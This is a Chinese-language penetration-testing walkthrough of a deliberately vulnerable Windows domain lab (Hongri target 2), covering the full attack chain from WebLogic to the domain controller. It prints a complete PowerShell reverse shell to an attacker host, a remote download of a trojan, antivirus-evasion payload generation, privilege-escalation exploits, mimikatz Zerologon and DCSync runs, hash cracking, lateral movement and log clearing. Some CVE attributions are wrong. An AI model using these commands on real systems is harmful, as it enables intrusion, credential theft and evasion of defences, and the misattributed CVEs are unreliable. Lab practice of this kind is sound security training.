紅日靶機二
環境搭建
只需要把虛擬機器的 host-only(僅主機)網路卡改為 10.10.10.0 網段,如下配置
把 NAT 網路卡,改為 192.168.96.0 網段,如下
首先恢復到 v1.3 快照
讓後點選放棄,放棄後再開機,用其他使用者 .\de1ay:1qaz@WSX 憑證登陸,密碼過期修改密碼就登陸成功了
完成後開啟 WEB 伺服器中的 WebLogic 服務
C:\Oracle\Middleware\user_projects\domains\base_domain\bin
以管理員省份執行
搭建完成,我們登入 kali
一、nmap 掃描
1)主機發現
sudo nmap -sn -o hosts 192.168.111.0/24
MAC Address: 00:50:56:FA:CB:D3 (VMware)
Nmap scan report for 192.168.111.80
Host is up (0.00013s latency).
MAC Address: 00:0C:29:BE:34:8C (VMware)
Nmap scan report for 192.168.111.201
看到 192.168.111.201 和 192.168.111.80 為新增加的 ip
2)埠發現
192.168.111.80
sudo nmap -sT --min-rate 10000 -p- 192.168.111.80 -o 80_ports
Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-24 16:09 CST
Nmap scan report for 192.168.111.80
Host is up (0.00040s latency).
Not shown: 65522 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1433/tcp open ms-sql-s
3389/tcp open ms-wbt-server
7001/tcp open afs3-callback
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49175/tcp open unknown
49261/tcp open unknown
60966/tcp open unknown
MAC Address: 00:0C:29:BE:34:8C (VMware)
Nmap done: 1 IP address (1 host up) scanned in 20.04 seconds
192.168.111.201
sudo nmap -sT --min-rate 10000 -p- 192.168.111.201 -o 201_ports
Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-24 16:04 CST
Nmap scan report for 192.168.111.201
Host is up (0.00045s latency).
Not shown: 65526 filtered tcp ports (no-response)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49178/tcp open unknown
MAC Address: 00:0C:29:84:B4:3E (VMware)
Nmap done: 1 IP address (1 host up) scanned in 13.44 seconds
看到 192.168.111.80 的機器開啟了 80 和 7001 埠,這顯然讓我們很感興趣,因為 web 的攻擊面是廣泛的,同時 7001 是 webLogic 的預設埠。我們對 192.168.111.80 進行詳細資訊掃描
3)詳細資訊掃描
首先我們對開放埠進行處理,加快掃描的速度和準確性
把開放埠複製給 ports 變數
ports=$(cat 80_ports | grep open | awk -F/ '{print $1}' | paste -sd ,)
在輸入$ports 後按 tab 鍵會補全
sudo nmap -sT -sV -sC -O -p$ports 192.168.111.80 -o details
# Nmap 7.93 scan initiated Tue Sep 24 16:18:25 2024 as: nmap -sT -sV -sC -O -p80,135,139,445,1433,3389,7001,49152,49153,49154,49175,49261,60966 -o details 192.168.111.80
Nmap scan report for 192.168.111.80
Host is up (0.00080s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Site doesn't have a title.
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds
1433/tcp open ms-sql-s Microsoft SQL Server 2008 R2 10.50.4000.00; SP2
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-09-24T07:53:06
|_Not valid after: 2054-09-24T07:53:06
|_ssl-date: 2024-09-24T08:20:30+00:00; 0s from scanner time.
| ms-sql-ntlm-info:
| 192.168.111.80:1433:
| Target_Name: DE1AY
| NetBIOS_Domain_Name: DE1AY
| NetBIOS_Computer_Name: WEB
| DNS_Domain_Name: de1ay.com
| DNS_Computer_Name: WEB.de1ay.com
| DNS_Tree_Name: de1ay.com
|_ Product_Version: 6.1.7601
| ms-sql-info:
| 192.168.111.80:1433:
| Version:
| name: Microsoft SQL Server 2008 R2 SP2
| number: 10.50.4000.00
| Product: Microsoft SQL Server 2008 R2
| Service pack level: SP2
| Post-SP patches applied: false
|_ TCP port: 1433
3389/tcp open ms-wbt-server?
| ssl-cert: Subject: commonName=WEB.de1ay.com
| Not valid before: 2024-09-23T07:46:09
|_Not valid after: 2025-03-25T07:46:09
| rdp-ntlm-info:
| Target_Name: DE1AY
| NetBIOS_Domain_Name: DE1AY
| NetBIOS_Computer_Name: WEB
| DNS_Domain_Name: de1ay.com
| DNS_Computer_Name: WEB.de1ay.com
| DNS_Tree_Name: de1ay.com
| Product_Version: 6.1.7601
|_ System_Time: 2024-09-24T08:19:51+00:00
|_ssl-date: 2024-09-24T08:20:30+00:00; 0s from scanner time.
7001/tcp open http Oracle WebLogic Server 10.3.6.0 (Servlet 2.5; JSP 2.1; T3 enabled)
|_http-title: Error 404--Not Found
|_weblogic-t3-info: T3 protocol in use (WebLogic version: 10.3.6.0)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49175/tcp open msrpc Microsoft Windows RPC
49261/tcp open msrpc Microsoft Windows RPC
60966/tcp open ms-sql-s Microsoft SQL Server 2008 R2 10.50.4000.00; SP2
| ms-sql-ntlm-info:
| 192.168.111.80:60966:
| Target_Name: DE1AY
| NetBIOS_Domain_Name: DE1AY
| NetBIOS_Computer_Name: WEB
| DNS_Domain_Name: de1ay.com
| DNS_Computer_Name: WEB.de1ay.com
| DNS_Tree_Name: de1ay.com
|_ Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-09-24T07:53:06
|_Not valid after: 2054-09-24T07:53:06
| ms-sql-info:
| 192.168.111.80:60966:
| Version:
| name: Microsoft SQL Server 2008 R2 SP2
| number: 10.50.4000.00
| Product: Microsoft SQL Server 2008 R2
| Service pack level: SP2
| Post-SP patches applied: false
|_ TCP port: 60966
|_ssl-date: 2024-09-24T08:20:30+00:00; 0s from scanner time.
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3389-TCP:V=7.93%I=7%D=9/24%Time=66F275DE%P=x86_64-pc-linux-gnu%r(Te
SF:rminalServerCookie,13,"\x03\0\0\x13\x0e\xd0\0\0\x124\0\x02\x01\x08\0\x0
SF:2\0\0\0");
MAC Address: 00:0C:29:BE:34:8C (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Microsoft Windows 7
OS CPE: cpe:/o:microsoft:windows_7
OS details: Microsoft Windows 7
Network Distance: 1 hop
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-os-discovery:
| OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
| OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
| Computer name: WEB
| NetBIOS computer name: WEB\x00
| Domain name: de1ay.com
| Forest name: de1ay.com
| FQDN: WEB.de1ay.com
|_ System time: 2024-09-24T16:19:55+08:00
|_clock-skew: mean: -53m19s, deviation: 2h39m58s, median: 0s
| smb2-security-mode:
| 210:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2024-09-24T08:19:54
|_ start_date: 2024-09-24T07:53:08
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Sep 24 16:20:30 2024 -- 1 IP address (1 host up) scanned in 124.83 seconds
看到 7001 就是 Weblogic 的服務
二、Web 滲透
開啟 80 頁面
是空白頁,我們只能放棄 80 了。
開啟 7001 埠
看到是有內容的,我們訪問 Weblogic 的預設登入頁面
http://192.168.111.80:7001/console/login/LoginForm.jsp
左下角透露出 Weblogic 的版本資訊 10.3.6.0
用 weblogicScanner 掃描攻擊列舉一下
git clone https://github.com/0xn0ne/weblogicScanner.git
cd weblogicScanner
python ws.py -t 192.168.111.80:7001
[20:35:09][INFO] [!][CVE-2019-2890][192.168.111.80:7001] Connection error.
[20:35:09][INFO] [!][CVE-2017-3248][192.168.111.80:7001] Connection error.
[20:35:09][INFO] [-][CVE-2017-3248][192.168.111.80:7001] Not vulnerability.
[20:35:09][INFO] [-][CVE-2019-2890][192.168.111.80:7001] Not vulnerability.
[20:35:10][INFO] [+][CVE-2019-2618][192.168.111.80:7001] Found module, Please verify manually!
[20:35:10][INFO] [+][CVE-2017-3506][192.168.111.80:7001] Exists vulnerability!
[20:35:11][INFO] [!][CVE-2018-2893][192.168.111.80:7001] Connection error.
[20:35:11][INFO] [!][CVE-2018-2628][192.168.111.80:7001] Connection error.
[20:35:11][INFO] [-][CVE-2018-2628][192.168.111.80:7001] Not vulnerability.
[20:35:11][INFO] [-][CVE-2018-2893][192.168.111.80:7001] Not vulnerability.
[20:35:12][INFO] [!][CVE-2020-14882][192.168.111.80:7001] Connection error.
[20:35:12][INFO] [-][CVE-2020-14882][192.168.111.80:7001] Not vulnerability.
[20:35:13][INFO] [-][CVE-2017-10271][192.168.111.80:7001] Not vulnerability.
[20:35:14][INFO] [+][CVE-2019-2888][192.168.111.80:7001] Found module, Please verify manually!
[20:35:15][INFO] [+][CVE-2019-2725][192.168.111.80:7001] Exists vulnerability!
[20:35:19][INFO] [-][CVE-2020-2883][192.168.111.80:7001] Not vulnerability.
[20:35:19][INFO] [-][CVE-2018-3191][192.168.111.80:7001] Not vulnerability.
[20:35:20][INFO] [-][CVE-2020-2555][192.168.111.80:7001] Not vulnerability.
[20:35:21][INFO] [!][CVE-2020-2551][192.168.111.80:7001] Connection error.
[20:35:21][INFO] [-][CVE-2020-2551][192.168.111.80:7001] Not found.
[20:35:23][INFO] [+][CVE-2014-4210][192.168.111.80:7001] Found module, Please verify manually!
[20:35:24][INFO] [+][CVE-2016-3510][192.168.111.80:7001] Exists vulnerability!
[20:35:24][INFO] [-][CVE-2016-0638][192.168.111.80:7001] Not vulnerability.
[20:35:24][INFO] [+][CVE-2020-14750][192.168.111.80:7001] Exists vulnerability!
[20:35:25][INFO] [+][CVE-2018-3245][192.168.111.80:7001] Exists vulnerability!
[20:35:27][INFO] [-][CVE-2019-2729][192.168.111.80:7001] Not vulnerability.
[20:35:30][INFO] [-][Weblogic Console][192.168.111.80:7001] Not found.
[20:35:30][INFO] [-][CVE-2018-2894][192.168.111.80:7001] Not found.
[20:35:30][INFO] [-][CVE-2020-14883][192.168.111.80:7001] Not vulnerability.
[20:35:32][INFO] [-][CVE-2018-3252][192.168.111.80:7001] Not found.
Run completed, 30 seconds total.
過濾一下結果
cat result.txt| grep + | sed -e 's/\[//g' | sed 's/\]/ /g'|awk '{print $4" " $6" " $7}'
CVE-2019-2618 Found module,
CVE-2017-3506 Exists vulnerability!
CVE-2019-2888 Found module,
CVE-2019-2725 Exists vulnerability!
CVE-2014-4210 Found module,
CVE-2016-3510 Exists vulnerability!
CVE-2020-14750 Exists vulnerability!
CVE-2018-3245 Exists vulnerability!
看到有 8 個可能存在或已經驗證存在的,沒什麼辦法,我們得一個一個試。
python CVE-2019-2618.py url username password
看到 CVE-2019-2618.py 需要認證資訊,我們對這種有條件限制的漏洞肯定是要優先順序排後的
嘗試 CVE-2017-3506 發現成功了
github 地址:https://github.com/Al1ex/CVE-2017-3506
開啟連結
看到使用者名稱 web\de1ay
三、獲得立足點
反彈 shell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.111.10', 4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
url 編碼
powershell%20-nop%20-c%20%22%24client%20%3D%20New-Object%20System.Net.Sockets.TCPClient('192.168.111.10'%2C%204444)%3B%24stream%20%3D%20%24client.GetStream()%3B%5Bbyte%5B%5D%5D%24bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile((%24i%20%3D%20%24stream.Read(%24bytes%2C%200%2C%20%24bytes.Length))%20-ne%200)%7B%3B%24data%20%3D%20(New-Object%20-TypeName%20System.Text.ASCIIEncoding).GetString(%24bytes%2C0%2C%20%24i)%3B%24sendback%20%3D%20(iex%20%24data%202%3E%261%20%7C%20Out-String%20)%3B%24sendback2%20%20%3D%20%24sendback%20%2B%20'PS%20'%20%2B%20(pwd).Path%20%2B%20'%3E%20'%3B%24sendbyte%20%3D%20(%5Btext.encoding%5D%3A%3AASCII).GetBytes(%24sendback2)%3B%24stream.Write(%24sendbyte%2C0%2C%24sendbyte.Length)%3B%24stream.Flush()%7D%3B%24client.Close()%22
成功反彈到 kali
執行
tasklist /svc
看到 360 的程序,應該是裝了 360 防毒軟體的
四、免殺對抗
1)上線 cs
生成 cs 免殺木馬
我們要對上線到 cs 的木馬做免殺,用到 bypassAV 外掛
baypassAV:https://github.com/hack2fun/BypassAV
因為這是靶機環境和虛擬環境的原因,導致 360 殺軟有部分功能的缺陷。我們使用 cs 外掛做的初級免殺就可以透過。這裡僅供學習參考
git clone https://github.com/hack2fun/BypassAV.git
在 cs 中匯入它的 bypass.cna 檔案
匯入成功
用 bypassAV 生成免殺程式
選擇 cs 的監聽器
kali 開啟 python 的 web 服務
python -m http.server
獲取的反彈 shell 中執行
powershell iex(new-object system.net.webclient).downloadfile('http://192.168.111.10:8000/shell.exe','c:\programdata\shell.exe')
簡單解釋:透過 iex(Invoke-Expression)執行字串的命令,用 webclient 傳送 http 請求,下載 shell.exe 檔案到機器上的 programdata 目錄
看到請求成功了,但是我們的 shell 死掉了,我們結束掉 shell,再次反彈一下
看到了我們上傳的木馬
執行
.\shell.exe
成功上線到 cs
2)上線 msf
a)直接轉移(失敗)
將 cs 會話遷移到 msf 上
在 msf 上
use exploit/multi/handler
msf6 exploit(multi/handler) > set Lhost 192.168.111.10
Lhost => 192.168.111.10
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.111.10:4444
在 cs 上
新增一個 foregin 的監聽器
右鍵選擇 spawn
選擇剛建立的 foregin 監聽器
看到失敗了,應該是被 360 給攔截了
b)msf 混淆(成功)
看一下編碼器
msfvenom -l encoder | grep x64
x64/xor normal XOR Encoder
x64/xor_context normal Hostname-based Context Keyed Payload Encoder
x64/xor_dynamic normal Dynamic key XOR Encoder
x64/zutto_dekiru manual Zutto Dekiru
生成一個 msf 的木馬,做免殺上線吧
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.111.10 LPORT=4444 -e x64/xor_dynamic -f exe -o payload.exe
用 msf 的引數做簡單的混淆,這是靶機,他只是真實環境的抽象,不可能說讓你去花很長的時間,做一個真正的免殺
上傳
這裡反彈 shell 的埠和 msf 木馬的監聽埠衝突了,切換了 nc 的監聽埠
執行
成功獲得了 meterpreter
五、提權
1)cs 上提權
cs 上就比較簡單了,直接利用檮杌(taowu)外掛中的,許可權提升模組就可以完成提權。
一個一個點選,點到 MS-14-058 時,成功提權
2)msf 提權
msf 提權就比較繁瑣了
在 msf 中檢視提權模組
search platform:windows type:exploit local
看到了很多提權的 exp,這就考驗我們對提權的 exp 選擇的經驗了
下面列舉常見的提權漏洞,不論成功與否,我們都可以嘗試一下,我也會標明
a)getsystem(失敗)
拿到 meterpreter 肯定現嘗試 getsystem
沒有提權成功
b)ms16_032(失敗)
secondary_logon_handle_privesc : 利用 Windows Secondary Logon 服務的漏洞。
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > use windows/local/ms16_032_secondary_logon_handle_privesc
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set session 6
session => 6
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > run
[*] Started reverse TCP handler on 192.168.111.10:4444
[+] Compressed size: 1160
[-] Exploit aborted due to failure: not-vulnerable: Target is not vulnerable
[+] Deleted
[*] Exploit completed, but no session was created.
c)ms14_058(成功)
ms14_058_track_popup_menu:利用了 Windows 中的 CVE-2014-6324 漏洞。該漏洞可以允許攻擊者在獲得最低許可權的使用者會話中提升許可權到管理員級別。
這裡有重現連了一下,所以session的id變了
use windows/local/ms14_058_track_popup_menu
msf6 exploit(windows/local/ms14_058_track_popup_menu) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms14_058_track_popup_menu) > set target 1
target => 1
msf6 exploit(windows/local/ms14_058_track_popup_menu) >set session 2
session => 2
msf6 exploit(windows/local/ms14_058_track_popup_menu) > run
[*] Started reverse TCP handler on 192.168.111.10:4444
[*] Reflectively injecting the exploit DLL and triggering the exploit...
[*] Launching msiexec to host the DLL...
[+] Process 4672 launched.
[*] Reflectively injecting the DLL into 4672...
[*] Sending stage (201798 bytes) to 192.168.111.80
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Meterpreter session 3 opened (192.168.111.10:4444 -> 192.168.111.80:63084) at 2024-09-26 15:09:59 +0800
meterpreter >
看到提權成功了
d)bypassuac(失敗)
還有很多方式,感興趣可以自己嘗試
六、橫向滲透
1)域控發現
執行mimikatz
看到憑證:de1ay:hongrisec@2024,mssql:1qaz@WSX
利用portscan發現主機
看到存活主機10.10.10.10,10.10.10.201兩臺
同時也掃描到了,他們開放的一些埠
10.10.10.201:3389
[+] received output:
10.10.10.201:139
10.10.10.201:135
10.10.10.10:5985
[+] received output:
10.10.10.10:3389
[+] received output:
10.10.10.10:636
10.10.10.10:593
[+] received output:
10.10.10.10:464
[+] received output:
10.10.10.10:389
[+] received output:
10.10.10.10:139
10.10.10.10:135
[+] received output:
10.10.10.10:88
[+] received output:
10.10.10.10:53
[+] received output:
10.10.10.10:445
10.10.10.201:445
可以在cs的beacon中使用ping -a來檢視主機的域名稱
shell ping -a -n 1 10.10.10.10
shell ping -a -n 1 10.10.10.201
看到10.10.10.10的名稱為DC,大機率他就是域控主機
而10.10.10.201請求超時了,我們暫時還無法確認它的身份
2)檢測漏洞
檢測域控主機是否存在zerologon漏洞
簡單介紹一下zerologon:
編號CVE-2020-1427,是指在使用NetLogon安全通道與域控進行連線時,由於認證協議加密加密部分存在缺陷,攻擊者可以將域控管理員使用者的密碼置空,從而進一步實現密碼hash的獲取,並最終完全控制域控主機。
NetLogon元件是Windows上的一個重要的功能元件,用於域控網路上認證使用者和機器,複製資料庫進行域控備份,維護域成員與域之間、域與域控之間、域DC與跨域DC之間的關係
在cs的beacon中執行
mimikatz lsadump::zerologon /target:DC.de1ay.com /account:DC$
beacon> mimikatz lsadump::zerologon /target:DC.de1ay.com /account:DC$
[*] Tasked beacon to run mimikatz's lsadump::zerologon /target:DC.de1ay.com /account:DC$ command
[+] host called home, sent: 750708 bytes
[+] received output:
Remote : DC.de1ay.com
ProtSeq : ncacn_ip_tcp
AuthnSvc : NONE
NULL Sess: no
Target : DC.de1ay.com
Account: DC$
Type : 6 (Server)
Mode : detect
Trying to 'authenticate'...
================================================================
NetrServerAuthenticate2: 0x00000000
* Authentication: OK -- vulnerable
看到存在zerologon漏洞
3)漏洞利用
mimikatz lsadump::zerologon /target:DC.de1ay.com /account:DC$ /exploit
[*] Tasked beacon to run mimikatz's lsadump::zerologon /target:DC.de1ay.com /account:DC$ /exploit command
[+] host called home, sent: 750708 bytes
[+] received output:
Remote : DC.de1ay.com
ProtSeq : ncacn_ip_tcp
AuthnSvc : NONE
NULL Sess: no
Target : DC.de1ay.com
Account: DC$
Type : 6 (Server)
Mode : exploit
Trying to 'authenticate'...
==============================================================================================
NetrServerAuthenticate2: 0x00000000
NetrServerPasswordSet2 : 0x00000000
* Authentication: OK -- vulnerable
* Set password : OK -- may be unstable
看到Set password : OK
發起dcsync攻擊,獲得域控使用者hash
mimikatz lsadump::dcsync /domain:de1ay.com /dc:DC.de1ay.com /user:administrator /authuser:DC$ /authdomain:de1ay /authpassword:"" /authntlm
[+] host called home, sent: 750705 bytes
[+] received output:
[DC] 'de1ay.com' will be the domain
[DC] 'DC.de1ay.com' will be the DC server
[DC] 'administrator' will be the user account
[AUTH] Username: DC$
[AUTH] Domain : de1ay
[AUTH] Password:
[AUTH] Explicit NTLM Mode
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000200 ( NORMAL_ACCOUNT )
Account expiration : 1601/1/1 8:00:00
Password last change : 2019/9/9 10:40:33
Object Security ID : S-1-5-21-2756371121-2868759905-3853650604-500
Object Relative ID : 500
Credentials:
Hash NTLM: 161cff084477fe596a5db81874498a24
看到Hash NTLM: 161cff084477fe596a5db81874498a24這就是管理員的hash
我們拿到kali中破解一下
hashcat creds /usr/share/wordlists/rockyou.txt -m 1000
看到憑證資訊:
administrator:1qaz@WSX
新增到cs中
開啟credentials,點選add
新增完成
4)橫向移動
a)域控
在192.168.111.80上新增listener
命名為DC
去到目標中,選擇域控
選擇剛新增的憑證和監聽器
看到域控上線成功
看到是域控的system許可權
b)其他機器
獲得了域控許可權,剩下的一臺,直接psexec跳就可以了
session選擇域控的
看到10.10.10.201的system使用者已經上線到
七、許可權維持
我在以前的文章中做過這方面操作的彙總,具體可以參考我的文章
《windows許可權維持彙總》
當然也可以使用cs的外掛完成
八、痕跡清理
主要就是要刪除我們在攻擊過程中,生成的日誌,以及自己為了滲透的順利進行所上傳的檔案
在cs的外掛中可以刪除系統的值日
總結
- 透過nmap的掃描發現了兩臺靶機的地址,分別做了埠掃描,發現192.168.111.80這臺機器開啟了80和7001埠,另一臺則沒有開啟。毫無疑問,我們肯定要把對80機器的滲透優先順序提前。
- 透過對80和7001埠的訪問,發現7001就是預設weblogic服務,用weblogicscan漏洞列舉工具發現它可能存在很多版本的漏洞,我們一個一個試錯,最終獲得了web機器的shell
- 拿到web機器許可權後,發現它的程序中開啟了360防毒軟體,對cs(msf)生成的木馬檔案進行了簡單的免殺後,成功上線cs(msf)
- 利用整合框架的提權模組,成功提權道了system
- 執行mimikatz的zerologon模組,探測到域控主機存在該漏洞,利用zerlogon成功橫向移動到了域控主機,並且獲得了域控的system許可權。利用域控的憑證資訊,同時也獲得了域內其他主機的system許可權
